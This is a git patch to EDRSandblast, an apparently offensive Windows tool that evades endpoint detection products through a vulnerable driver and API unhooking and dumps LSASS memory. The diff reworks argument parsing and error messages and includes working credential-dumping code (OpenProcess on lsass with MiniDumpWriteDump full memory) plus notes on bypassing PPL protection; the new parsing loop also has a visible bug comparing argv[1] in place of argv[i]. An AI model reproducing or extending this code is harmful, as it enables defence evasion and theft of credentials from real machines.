From d29986ab806df73ac98880a2b8136f8a2976548e Mon Sep 17 00:00:00 2001 From: Maxime Meignan Date: Mon, 17 Jan 2022 17:13:47 +0100 Subject: [PATCH] Improved error verbosity --- EDRSandblast/EDRSandBlast.h | 3 ++- EDRSandblast/EDRSandblast.c | 45 ++++++++++++++++++++-------------- EDRSandblast/Utils/LSASSDump.c | 32 +++++++++--------------- Offsets/ExtractOffsets.py | 9 +++++-- 4 files changed, 48 insertions(+), 41 deletions(-) diff --git a/EDRSandblast/EDRSandBlast.h b/EDRSandblast/EDRSandBlast.h index 1f28085..9e4d2c3 100644 --- a/EDRSandblast/EDRSandBlast.h +++ b/EDRSandblast/EDRSandBlast.h @@ -4,5 +4,6 @@ typedef enum _START_MODE { dump, cmd, credguard, - audit + audit, + none } START_MODE; \ No newline at end of file diff --git a/EDRSandblast/EDRSandblast.c b/EDRSandblast/EDRSandblast.c index 4ad624b..62d5319 100644 --- a/EDRSandblast/EDRSandblast.c +++ b/EDRSandblast/EDRSandblast.c @@ -26,7 +26,7 @@ int _tmain(int argc, TCHAR** argv) { // Parse command line arguments and initialize variables to default values if needed. - const TCHAR usage[] = TEXT("Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] [--usermode [--unhook-method ]] [--kernelmode] [--dont-unload-driver] [--dont-restore-callbacks] [--driver ] [--service ] [--nt-offsets ] [--wdigest-offsets ] [--add-dll ]* [-o | --dump-output ]"); + const TCHAR usage[] = TEXT("Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] [--usermode [--unhook-method ]] [--kernelmode] [--dont-unload-driver] [--dont-restore-callbacks] [--driver ] [--service ] [--nt-offsets ] [--wdigest-offsets ] [--add-dll ]* [-o | --dump-output ]"); const TCHAR extendedUsage[] = TEXT("\n\ -h | --help Show this help message and exit.\n\ -v | --verbose Enable a more verbose output.\n\ @@ -94,21 +94,7 @@ Other options:\n\ return EXIT_FAILURE; } - START_MODE startMode; - if (_tcsicmp(argv[1], TEXT("dump")) == 0) { startMode = dump; } - else if (_tcsicmp(argv[1], TEXT("cmd")) == 0) { startMode = cmd; } - else if (_tcsicmp(argv[1], TEXT("credguard")) == 0) { startMode = credguard; } - else if (_tcsicmp(argv[1], TEXT("audit")) == 0) { startMode = audit; } - else if (_tcsicmp(argv[1], TEXT("-h")) == 0 || _tcsicmp(argv[1], TEXT("--help")) == 0) { - _tprintf(TEXT("%s\n"), usage); - _tprintf(TEXT("%s\n"), extendedUsage); - return EXIT_SUCCESS; - } - else { - _tprintf(TEXT("%s"), usage); - return EXIT_FAILURE; - } - + START_MODE startMode = none; TCHAR driverPath[MAX_PATH * 2] = { 0 }; TCHAR driverDefaultName[] = TEXT("RTCore64.sys"); TCHAR ntoskrnlOffsetCSVPath[MAX_PATH * 2] = { 0 }; @@ -127,8 +113,24 @@ Other options:\n\ hook* hooks = NULL; - for (int i = 2; i < argc; i++) { - if (_tcsicmp(argv[i], TEXT("-h")) == 0 || _tcsicmp(argv[i], TEXT("--help")) == 0) { + for (int i = 1; i < argc; i++) { + if (_tcsicmp(argv[i], TEXT("dump")) == 0) { + startMode = dump; + } + else if (_tcsicmp(argv[1], TEXT("cmd")) == 0) { + startMode = cmd; + } + else if (_tcsicmp(argv[1], TEXT("credguard")) == 0) { + startMode = credguard; + } + else if (_tcsicmp(argv[1], TEXT("audit")) == 0) { + startMode = audit; + } + else if (_tcsicmp(argv[1], TEXT("-h")) == 0 || _tcsicmp(argv[1], TEXT("--help")) == 0) { + _tprintf(TEXT("%s\n"), usage); + _tprintf(TEXT("%s\n"), extendedUsage); + return EXIT_SUCCESS; + } else if (_tcsicmp(argv[i], TEXT("-h")) == 0 || _tcsicmp(argv[i], TEXT("--help")) == 0) { _tprintf(TEXT("%s\n"), usage); _tprintf(TEXT("%s\n"), extendedUsage); return EXIT_SUCCESS; @@ -215,6 +217,10 @@ Other options:\n\ } // Command line option consistency checks. + if (startMode == none){ + _tprintf(TEXT("[!] You did not provide an action to perform: audit, dump, credguard or cmd\n")); + return EXIT_FAILURE; + } if (startMode == cmd && !kernelMode) { _tprintf(TEXT("'cmd' mode needs kernel-land unhooking to work, please enable --kernelmode\n")); return EXIT_FAILURE; @@ -229,6 +235,9 @@ Other options:\n\ if (startMode == dump && !kernelMode) { _tprintf(TEXT("[!] LSASS dump might fail if RunAsPPL is enabled. Enable --kernelmode to bypass PPL\n")); } + if (!userMode && kernelMode) { + _tprintf(TEXT("[!] If kernel mode bypass is enabled, it is recommended to enable usermode bypass as well (e.g. to unhook the NtLoadDriver API call)\n")); + } BOOL isSafeToExecutePayload = TRUE; diff --git a/EDRSandblast/Utils/LSASSDump.c b/EDRSandblast/Utils/LSASSDump.c index 144a1c5..8188f7e 100644 --- a/EDRSandblast/Utils/LSASSDump.c +++ b/EDRSandblast/Utils/LSASSDump.c @@ -70,32 +70,24 @@ DWORD WINAPI dumpLSASSProcess(void* data) { continue; } - // Retrieve the priority class. - dwPriorityClass = 0; hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID); if (hProcess == NULL || hProcess == INVALID_HANDLE_VALUE) { - _tprintf(TEXT("[!] LSASS dump failed: couldn't open lsass memory (OpenProcess)\n")); + _tprintf(TEXT("[!] LSASS dump failed: couldn't open lsass memory (OpenProcesswith error 0x%x)\n"), GetLastError()); return 1; } - else { - dwPriorityClass = GetPriorityClass(hProcess); - if (!dwPriorityClass) { - _tprintf(TEXT("[!] LSASS dump non fatal error: couldn't retrieve LSASS process' priority class (GetPriorityClass)\n")); - } - HANDLE hDumpFile = CreateFile(outputDump, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); - if (hDumpFile == INVALID_HANDLE_VALUE) { - _tprintf(TEXT("[!] LSASS dump failed: couldn't create dump file (CreateFileA)\n")); - return 1; - } - BOOL dumped = MiniDumpWriteDump(hProcess, pe32.th32ProcessID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL); - if (!dumped) { - _tprintf(TEXT("[!] LSASS dump failed: couldn't dump LSASS process (MiniDumpWriteDump)\n")); - return 1; - } - _tprintf(TEXT("[+] LSASS sucessfully dump to: %s\n"), outputDump); - CloseHandle(hProcess); + HANDLE hDumpFile = CreateFile(outputDump, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hDumpFile == INVALID_HANDLE_VALUE) { + _tprintf(TEXT("[!] LSASS dump failed: couldn't create dump file (CreateFileA)\n")); + return 1; } + BOOL dumped = MiniDumpWriteDump(hProcess, pe32.th32ProcessID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL); + if (!dumped) { + _tprintf(TEXT("[!] LSASS dump failed: couldn't dump LSASS process (MiniDumpWriteDump with error 0x%x)\n"), GetLastError()); + return 1; + } + _tprintf(TEXT("[+] LSASS sucessfully dump to: %s\n"), outputDump); + CloseHandle(hProcess); } while (Process32Next(hProcessSnap, &pe32)); diff --git a/Offsets/ExtractOffsets.py b/Offsets/ExtractOffsets.py index ca82521..e3e7761 100644 --- a/Offsets/ExtractOffsets.py +++ b/Offsets/ExtractOffsets.py @@ -225,13 +225,18 @@ if __name__ == '__main__': help='Flag to download the PE from Microsoft servers using list of versions from winbindex.m417z.com.') args = parser.parse_args() - mode = args.mode + mode = args.mode.lower() if mode not in knownImageVersions: print(f'[!] ERROR : unsupported mode "{args.mode}", supported mode are: "ntoskrnl" and "wdigest"') exit(1) # check R2 version - output = run(["r2", "-V"], capture_output=True).stdout.decode() + r = run(["r2", "-V"], capture_output=True) + if r.returncode != 0: + print(f"Error: the following error message was printed while running 'r2 -V':") + print(r.stderr) + exit(r.returncode) + output = r.stdout.decode() ma,me,mi = map(int, output.splitlines()[0].split(" ")[0].split(".")) if (ma, me, mi) < (5,0,0): print("WARNING : This script has been tested with radare2 5.0.0 (works) and 4.3.1 (does NOT work)")